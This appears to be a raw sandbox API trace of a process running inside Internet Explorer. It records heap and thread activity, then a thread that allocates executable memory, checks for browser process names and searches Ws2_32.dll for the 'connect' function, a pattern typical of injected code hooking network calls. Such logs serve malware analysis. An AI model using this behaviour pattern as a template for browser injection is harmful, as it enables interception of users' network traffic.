	[0193.828] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x502f628, cbMultiByte=256, lpWideCharStr=0x502ed78, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256
	[0193.828] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256
	[0193.828] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x502eb68, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256
	[0193.828] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x502f428, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x25\xa2\x41\x66\x64\xf7\x02\x05\xce\x6c\xab\x01\x90\x7f\x14", lpUsedDefaultChar=0x0) returned 256
	[0193.828] RtlAllocateHeap (HeapHandle=0x90000, Flags=0x0, Size=0x80) returned 0x4b71d98
	[0193.828] RtlInitializeSListHead (in: ListHead=0x1ac3ae8 | out: ListHead=0x1ac3ae8) 
	[0193.828] RtlAllocateHeap (HeapHandle=0x90000, Flags=0x8, Size=0x800) returned 0x4b68800
	[0193.828] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1
	[0193.828] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1ac3bd8, nSize=0x104 | out: lpFilename="C:\\Program Files\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files\\internet explorer\\iexplore.exe")) returned 0x2f
	[0193.828] RtlAllocateHeap (HeapHandle=0x90000, Flags=0x8, Size=0x59) returned 0x4b5d128
	[0193.828] GetEnvironmentStringsW () returned 0x4673fd8*
	[0193.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1249, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1249
	[0193.828] RtlAllocateHeap (HeapHandle=0x90000, Flags=0x0, Size=0x4e1) returned 0x4b92308
	[0193.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1249, lpMultiByteStr=0x4b92308, cbMultiByte=1249, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1249
	[0193.828] FreeEnvironmentStringsW (penv=0x4673fd8) returned 1
	[0193.828] RtlAllocateHeap (HeapHandle=0x90000, Flags=0x8, Size=0x8c) returned 0x10b528
	[0193.828] RtlAllocateHeap (HeapHandle=0x90000, Flags=0x8, Size=0x1f) returned 0x4c3b640
	[0193.828] RtlAllocateHeap (HeapHandle=0x90000, Flags=0x8, Size=0x2e) returned 0x46c13b0
	[0193.828] RtlAllocateHeap (HeapHandle=0x90000, Flags=0x8, Size=0x31) returned 0x464d6d8
	[0193.828] RtlAllocateHeap (HeapHandle=0x90000, Flags=0x8, Size=0x16) returned 0x43bafe8
	[0193.828] RtlAllocateHeap (HeapHandle=0x90000, Flags=0x8, Size=0x24) returned 0x4c38d10
	[0193.828] RtlAllocateHeap (HeapHandle=0x90000, Flags=0x8, Size=0x14) returned 0x43bae68
	[0193.828] RtlAllocateHeap (HeapHandle=0x90000, Flags=0x8, Size=0xd) returned 0x4a96e38
	[0193.828] RtlAllocateHeap (HeapHandle=0x90000, Flags=0x8, Size=0x1d) returned 0x4c3b668
	[0193.828] RtlAllocateHeap (HeapHandle=0x90000, Flags=0x8, Size=0x31) returned 0x464db58
	[0193.829] RtlAllocateHeap (HeapHandle=0x90000, Flags=0x8, Size=0x17) returned 0x43b8ca8
	[0193.829] RtlAllocateHeap (HeapHandle=0x90000, Flags=0x8, Size=0x17) returned 0x43bb7a8
	[0193.829] RtlAllocateHeap (HeapHandle=0x90000, Flags=0x8, Size=0xe) returned 0x4a95f80
	[0193.829] RtlAllocateHeap (HeapHandle=0x90000, Flags=0x8, Size=0xb1) returned 0x46afbb0
	[0193.829] RtlAllocateHeap (HeapHandle=0x90000, Flags=0x8, Size=0x3e) returned 0x46a4ee8
	[0193.829] RtlAllocateHeap (HeapHandle=0x90000, Flags=0x8, Size=0x1b) returned 0x4c3b690
	[0193.829] RtlAllocateHeap (HeapHandle=0x90000, Flags=0x8, Size=0x44) returned 0x4659750
	[0193.829] RtlAllocateHeap (HeapHandle=0x90000, Flags=0x8, Size=0x12) returned 0x43bb828
	[0193.829] RtlAllocateHeap (HeapHandle=0x90000, Flags=0x8, Size=0x18) returned 0x43baa88
	[0193.829] RtlAllocateHeap (HeapHandle=0x90000, Flags=0x8, Size=0x1b) returned 0x4c3b6b8
	[0193.829] RtlAllocateHeap (HeapHandle=0x90000, Flags=0x8, Size=0x1e) returned 0x4c3b6e0
	[0193.829] RtlAllocateHeap (HeapHandle=0x90000, Flags=0x8, Size=0xc) returned 0x4a962e0
	[0193.829] RtlAllocateHeap (HeapHandle=0x90000, Flags=0x8, Size=0x41) returned 0x4c6d880
	[0193.829] RtlAllocateHeap (HeapHandle=0x90000, Flags=0x8, Size=0x17) returned 0x43baa48
	[0193.829] RtlAllocateHeap (HeapHandle=0x90000, Flags=0x8, Size=0x14) returned 0x43b87e8
	[0193.829] RtlAllocateHeap (HeapHandle=0x90000, Flags=0x8, Size=0xf) returned 0x4a97930
	[0193.829] RtlAllocateHeap (HeapHandle=0x90000, Flags=0x8, Size=0x16) returned 0x43bb328
	[0193.829] RtlAllocateHeap (HeapHandle=0x90000, Flags=0x8, Size=0x2a) returned 0x46c1998
	[0193.829] RtlAllocateHeap (HeapHandle=0x90000, Flags=0x8, Size=0x29) returned 0x4c77ee8
	[0193.829] RtlAllocateHeap (HeapHandle=0x90000, Flags=0x8, Size=0x14) returned 0x43bb368
	[0193.829] RtlAllocateHeap (HeapHandle=0x90000, Flags=0x8, Size=0x16) returned 0x43bb348
	[0193.829] RtlAllocateHeap (HeapHandle=0x90000, Flags=0x8, Size=0x22) returned 0x4c38da0
	[0193.829] RtlAllocateHeap (HeapHandle=0x90000, Flags=0x8, Size=0x12) returned 0x43bae88
	[0193.829] RtlAllocateHeap (HeapHandle=0x90000, Flags=0x8, Size=0x18) returned 0x43b85a8
	[0193.829] RtlAllocateHeap (HeapHandle=0x90000, Flags=0x8, Size=0x46) returned 0x4c6d8d0
	[0193.829] HeapFree (in: hHeap=0x90000, dwFlags=0x0, lpMem=0x4b92308 | out: hHeap=0x90000) returned 1
	[0193.829] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1ab16fd, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x502f808 | out: lpThreadId=0x502f808*=0x37c) returned 0x8f8
	[0193.830] CloseHandle (hObject=0x8f8) returned 1
	[0193.830] RtlExitUserThread (Status=0x1) 
	[0193.830] HeapFree (in: hHeap=0x90000, dwFlags=0x0, lpMem=0x4718538 | out: hHeap=0x90000) returned 1

Thread:
	id = 213
	os_tid = 0x37c

	[0193.831] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1ab1479, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x626f87c | out: lpThreadId=0x626f87c*=0xba4) returned 0x8f8
	[0193.831] GetExitCodeThread (in: hThread=0x8f8, lpExitCode=0x626f880 | out: lpExitCode=0x626f880) returned 1
	[0193.831] WaitForSingleObject (hHandle=0x8f8, dwMilliseconds=0xffffffff) returned 0x0

Thread:
	id = 214
	os_tid = 0xba4

	[0193.832] VirtualAlloc (lpAddress=0x0, dwSize=0x1aa, flAllocationType=0x3000, flProtect=0x40) returned 0x1ad0000
	[0193.832] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x50ff9c8, nSize=0x104 | out: lpFilename="C:\\Program Files\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files\\internet explorer\\iexplore.exe")) returned 0x2f
	[0193.832] PathFindFileNameA (pszPath="C:\\Program Files\\Internet Explorer\\iexplore.exe") returned="iexplore.exe"
	[0193.832] lstrcmpiA (lpString1="iexplore.exe", lpString2="microsoftedgecp.exe") returned -1
	[0193.832] lstrcmpiA (lpString1="iexplore.exe", lpString2="iexplore.exe") returned 0
	[0193.832] GetModuleHandleA (lpModuleName="Ws2_32.dll") returned 0x75a90000
	[0193.833] GetProcAddress (hModule=0x75a90000, lpProcName="connect") returned 0x75a96bdd
	[0193.833] LoadLibraryA (lpLibFileName="Ws2_32.dll") returned 0x75a90000
	[0193.833] lstrcmpA (lpString1="FreeAddrInfoEx", lpString2="connect") returned 1
	[0193.833] lstrcmpA (lpString1="FreeAddrInfoExW", lpString2="connect") returned 1
	[0193.833] lstrcmpA (lpString1="FreeAddrInfoW", lpString2="connect") returned 1
	[0193.833] lstrcmpA (lpString1="GetAddrInfoExA", lpString2="connect") returned 1
	[0193.833] lstrcmpA (lpString1="GetAddrInfoExW", lpString2="connect") returned 1
	[0193.833] lstrcmpA (lpString1="GetAddrInfoW", lpString2="connect") returned 1
	[0193.833] lstrcmpA (lpString1="GetNameInfoW", lpString2="connect") returned 1
	[0193.833] lstrcmpA (lpString1="InetNtopW", lpString2="connect") returned 1
	[0193.833] lstrcmpA (lpString1="InetPtonW", lpString2="connect") returned 1
	[0193.833] lstrcmpA (lpString1="SetAddrInfoExA", lpString2="connect") returned 1
	[0193.833] lstrcmpA (lpString1="SetAddrInfoExW", lpString2="connect") returned 1
	[0193.833] lstrcmpA (lpString1="WEP", lpString2="connect") returned 1
	[0193.833] lstrcmpA (lpString1="WPUCompleteOverlappedRequest", lpString2="connect") returned 1
	[0193.833] lstrcmpA (lpString1="WSAAccept", lpString2="connect") returned 1
	[0193.833] lstrcmpA (lpString1="WSAAddressToStringA", lpString2="connect") returned 1
	[0193.833] lstrcmpA (lpString1="WSAAddressToStringW", lpString2="connect") returned 1
	[0193.833] lstrcmpA (lpString1="WSAAdvertiseProvider", lpString2="connect") returned 1
	[0193.833] lstrcmpA (lpString1="WSAAsyncGetHostByAddr", lpString2="connect") returned 1
	[0193.833] lstrcmpA (lpString1="WSAAsyncGetHostByName", lpString2="connect") returned 1
	[0193.833] lstrcmpA (lpString1="WSAAsyncGetProtoByName", lpString2="connect") returned 1
	[0193.833] lstrcmpA (lpString1="WSAAsyncGetProtoByNumber", lpString2="connect") returned 1
	[0193.833] lstrcmpA (lpString1="WSAAsyncGetServByName", lpString2="connect") returned 1
	[0193.833] lstrcmpA (lpString1="WSAAsyncGetServByPort", lpString2="connect") returned 1
	[0193.833] lstrcmpA (lpString1="WSAAsyncSelect", lpString2="connect") returned 1
	[0193.834] lstrcmpA (lpString1="WSACancelAsyncRequest", lpString2="connect") returned 1
	[0193.834] lstrcmpA (lpString1="WSACancelBlockingCall", lpString2="connect") returned 1
	[0193.834] lstrcmpA (lpString1="WSACleanup", lpString2="connect") returned 1
	[0193.834] lstrcmpA (lpString1="WSACloseEvent", lpString2="connect") returned 1
	[0193.834] lstrcmpA (lpString1="WSAConnect", lpString2="connect") returned 1
	[0193.834] lstrcmpA (lpString1="WSAConnectByList", lpString2="connect") returned 1
	[0193.834] lstrcmpA (lpString1="WSAConnectByNameA", lpString2="connect") returned 1
	[0193.834] lstrcmpA (lpString1="WSAConnectByNameW", lpString2="connect") returned 1
	[0193.834] lstrcmpA (lpString1="WSACreateEvent", lpString2="connect") returned 1
	[0193.834] lstrcmpA (lpString1="WSADuplicateSocketA", lpString2="connect") returned 1
	[0193.834] lstrcmpA (lpString1="WSADuplicateSocketW", lpString2="connect") returned 1
	[0193.834] lstrcmpA (lpString1="WSAEnumNameSpaceProvidersA", lpString2="connect") returned 1
	[0193.834] lstrcmpA (lpString1="WSAEnumNameSpaceProvidersExA", lpString2="connect") returned 1
	[0193.834] lstrcmpA (lpString1="WSAEnumNameSpaceProvidersExW", lpString2="connect") returned 1
	[0193.834] lstrcmpA (lpString1="WSAEnumNameSpaceProvidersW", lpString2="connect") returned 1
	[0193.834] lstrcmpA (lpString1="WSAEnumNetworkEvents", lpString2="connect") returned 1
	[0193.834] lstrcmpA (lpString1="WSAEnumProtocolsA", lpString2="connect") returned 1
	[0193.834] lstrcmpA (lpString1="WSAEnumProtocolsW", lpString2="connect") returned 1
	[0193.834] lstrcmpA (lpString1="WSAEventSelect", lpString2="connect") returned 1
	[0193.834] lstrcmpA (lpString1="WSAGetLastError", lpString2="connect") returned 1
	[0193.834] lstrcmpA (lpString1="WSAGetOverlappedResult", lpString2="connect") returned 1
	[0193.834] lstrcmpA (lpString1="WSAGetQOSByName", lpString2="connect") returned 1
	[0193.834] lstrcmpA (lpString1="WSAGetServiceClassInfoA", lpString2="connect") returned 1
	[0193.834] lstrcmpA (lpString1="WSAGetServiceClassInfoW", lpString2="connect") returned 1
	[0193.834] lstrcmpA (lpString1="WSAGetServiceClassNameByClassIdA", lpString2="connect") returned 1
	[0193.834] lstrcmpA (lpString1="WSAGetServiceClassNameByClassIdW", lpString2="connect") returned 1
	[0193.834] lstrcmpA (lpString1="WSAHtonl", lpString2="connect") returned 1
	[0193.834] lstrcmpA (lpString1="WSAHtons", lpString2="connect") returned 1
	[0193.834] lstrcmpA (lpString1="WSAInstallServiceClassA", lpString2="connect") returned 1
	[0193.834] lstrcmpA (lpString1="WSAInstallServiceClassW", lpString2="connect") returned 1
	[0193.834] lstrcmpA (lpString1="WSAIoctl", lpString2="connect") returned 1
	[0193.834] lstrcmpA (lpString1="WSAIsBlocking", lpString2="connect") returned 1
	[0193.834] lstrcmpA (lpString1="WSAJoinLeaf", lpString2="connect") returned 1
	[0193.834] lstrcmpA (lpString1="WSALookupServiceBeginA", lpString2="connect") returned 1
	[0193.834] lstrcmpA (lpString1="WSALookupServiceBeginW", lpString2="connect") returned 1
	[0193.834] lstrcmpA (lpString1="WSALookupServiceEnd", lpString2="connect") returned 1
	[0193.834] lstrcmpA (lpString1="WSALookupServiceNextA", lpString2="connect") returned 1
	[0193.834] lstrcmpA (lpString1="WSALookupServiceNextW", lpString2="connect") returned 1
	[0193.834] lstrcmpA (lpString1="WSANSPIoctl", lpString2="connect") returned 1
	[0193.834] lstrcmpA (lpString1="WSANtohl", lpString2="connect") returned 1
	[0193.834] lstrcmpA (lpString1="WSANtohs", lpString2="connect") returned 1
	[0193.834] lstrcmpA (lpString1="WSAPoll", lpString2="connect") returned 1
	[0193.834] lstrcmpA (lpString1="WSAProviderCompleteAsyncCall", lpString2="connect") returned 1
	[0193.834] lstrcmpA (lpString1="WSAProviderConfigChange", lpString2="connect") returned 1
	[0193.834] lstrcmpA (lpString1="WSARecv", lpString2="connect") returned 1
	[0193.834] lstrcmpA (lpString1="WSARecvDisconnect", lpString2="connect") returned 1
	[0193.834] lstrcmpA (lpString1="WSARecvFrom", lpString2="connect") returned 1
	[0193.835] lstrcmpA (lpString1="WSARemoveServiceClass", lpString2="connect") returned 1
	[0193.835] lstrcmpA (lpString1="WSAResetEvent", lpString2="connect") returned 1
	[0193.835] lstrcmpA (lpString1="WSASend", lpString2="connect") returned 1
	[0193.835] lstrcmpA (lpString1="WSASendDisconnect", lpString2="connect") returned 1
	[0193.835] lstrcmpA (lpString1="WSASendMsg", lpString2="connect") returned 1
	[0193.835] lstrcmpA (lpString1="WSASendTo", lpString2="connect") returned 1
	[0193.835] lstrcmpA (lpString1="WSASetBlockingHook", lpString2="connect") returned 1
	[0193.835] lstrcmpA (lpString1="WSASetEvent", lpString2="connect") returned 1
	[0193.835] lstrcmpA (lpString1="WSASetLastError", lpString2="connect") returned 1
	[0193.835] lstrcmpA (lpString1="WSASetServiceA", lpString2="connect") returned 1
	[0193.835] lstrcmpA (lpString1="WSASetServiceW", lpString2="connect") returned 1
	[0193.835] lstrcmpA (lpString1="WSASocketA", lpString2="connect") returned 1
	[0193.835] lstrcmpA (lpString1="WSASocketW", lpString2="connect") returned 1
	[0193.835] lstrcmpA (lpString1="WSAStartup", lpString2="connect") returned 1
	[0193.835] lstrcmpA (lpString1="WSAStringToAddressA", lpString2="connect") returned 1
	[0193.835] lstrcmpA (lpString1="WSAStringToAddressW", lpString2="connect") returned 1
	[0193.835] lstrcmpA (lpString1="WSAUnadvertiseProvider", lpString2="connect") returned 1
	[0193.835] lstrcmpA (lpString1="WSAUnhookBlockingHook", lpString2="connect") returned 1
	[0193.835] lstrcmpA (lpString1="WSAWaitForMultipleEvents", lpString2="connect") returned 1
	[0193.835] lstrcmpA (lpString1="WSApSetPostRoutine", lpString2="connect") returned 1
	[0193.835] lstrcmpA (lpString1="WSCDeinstallProvider", lpString2="connect") returned 1
	[0193.835] lstrcmpA (lpString1="WSCEnableNSProvider", lpString2="connect") returned 1
	[0193.835] lstrcmpA (lpString1="WSCEnumProtocols", lpString2="connect") returned 1
	[0193.835] lstrcmpA (lpString1="WSCGetApplicationCategory", lpString2="connect") returned 1
	[0193.835] lstrcmpA (lpString1="WSCGetProviderInfo", lpString2="connect") returned 1
	[0193.835] lstrcmpA (lpString1="WSCGetProviderPath", lpString2="connect") returned 1
	[0193.835] lstrcmpA (lpString1="WSCInstallNameSpace", lpString2="connect") returned 1
	[0193.835] lstrcmpA (lpString1="WSCInstallNameSpaceEx", lpString2="connect") returned 1
	[0193.835] lstrcmpA (lpString1="WSCInstallProvider", lpString2="connect") returned 1
	[0193.835] lstrcmpA (lpString1="WSCInstallProviderAndChains", lpString2="connect") returned 1
	[0193.835] lstrcmpA (lpString1="WSCSetApplicationCategory", lpString2="connect") returned 1
	[0193.835] lstrcmpA (lpString1="WSCSetProviderInfo", lpString2="connect") returned 1
	[0193.835] lstrcmpA (lpString1="WSCUnInstallNameSpace", lpString2="connect") returned 1
	[0193.835] lstrcmpA (lpString1="WSCUpdateProvider", lpString2="connect") returned 1
	[0193.835] lstrcmpA (lpString1="WSCWriteNameSpaceOrder", lpString2="connect") returned 1
	[0193.835] lstrcmpA (lpString1="WSCWriteProviderOrder", lpString2="connect") returned 1
	[0193.835] lstrcmpA (lpString1="WahCloseApcHelper", lpString2="connect") returned 1
	[0193.835] lstrcmpA (lpString1="WahCloseHandleHelper", lpString2="connect") returned 1
	[0193.835] lstrcmpA (lpString1="WahCloseNotificationHandleHelper", lpString2="connect") returned 1
	[0193.835] lstrcmpA (lpString1="WahCloseSocketHandle", lpString2="connect") returned 1
	[0193.835] lstrcmpA (lpString1="WahCloseThread", lpString2="connect") returned 1
	[0193.835] lstrcmpA (lpString1="WahCompleteRequest", lpString2="connect") returned 1
	[0193.835] lstrcmpA (lpString1="WahCreateHandleContextTable", lpString2="connect") returned 1
	[0193.835] lstrcmpA (lpString1="WahCreateNotificationHandle", lpString2="connect") returned 1
	[0193.835] lstrcmpA (lpString1="WahCreateSocketHandle", lpString2="connect") returned 1
	[0193.835] lstrcmpA (lpString1="WahDestroyHandleContextTable", lpString2="connect") returned 1
	[0193.836] lstrcmpA (lpString1="WahDisableNonIFSHandleSupport", lpString2="connect") returned 1
	[0193.836] lstrcmpA (lpString1="WahEnableNonIFSHandleSupport", lpString2="connect") returned 1
	[0193.836] lstrcmpA (lpString1="WahEnumerateHandleContexts", lpString2="connect") returned 1
	[0193.836] lstrcmpA (lpString1="WahInsertHandleContext", lpString2="connect") returned 1
	[0193.836] lstrcmpA (lpString1="WahNotifyAllProcesses", lpString2="connect") returned 1
	[0193.836] lstrcmpA (lpString1="WahOpenApcHelper", lpString2="connect") returned 1
	[0193.836] lstrcmpA (lpString1="WahOpenCurrentThread", lpString2="connect") returned 1
	[0193.836] lstrcmpA (lpString1="WahOpenHandleHelper", lpString2="connect") returned 1
	[0193.836] lstrcmpA (lpString1="WahOpenNotificationHandleHelper", lpString2="connect") returned 1
	[0193.836] lstrcmpA (lpString1="WahQueueUserApc", lpString2="connect") returned 1
	[0193.836] lstrcmpA (lpString1="WahReferenceContextByHandle", lpString2="connect") returned 1
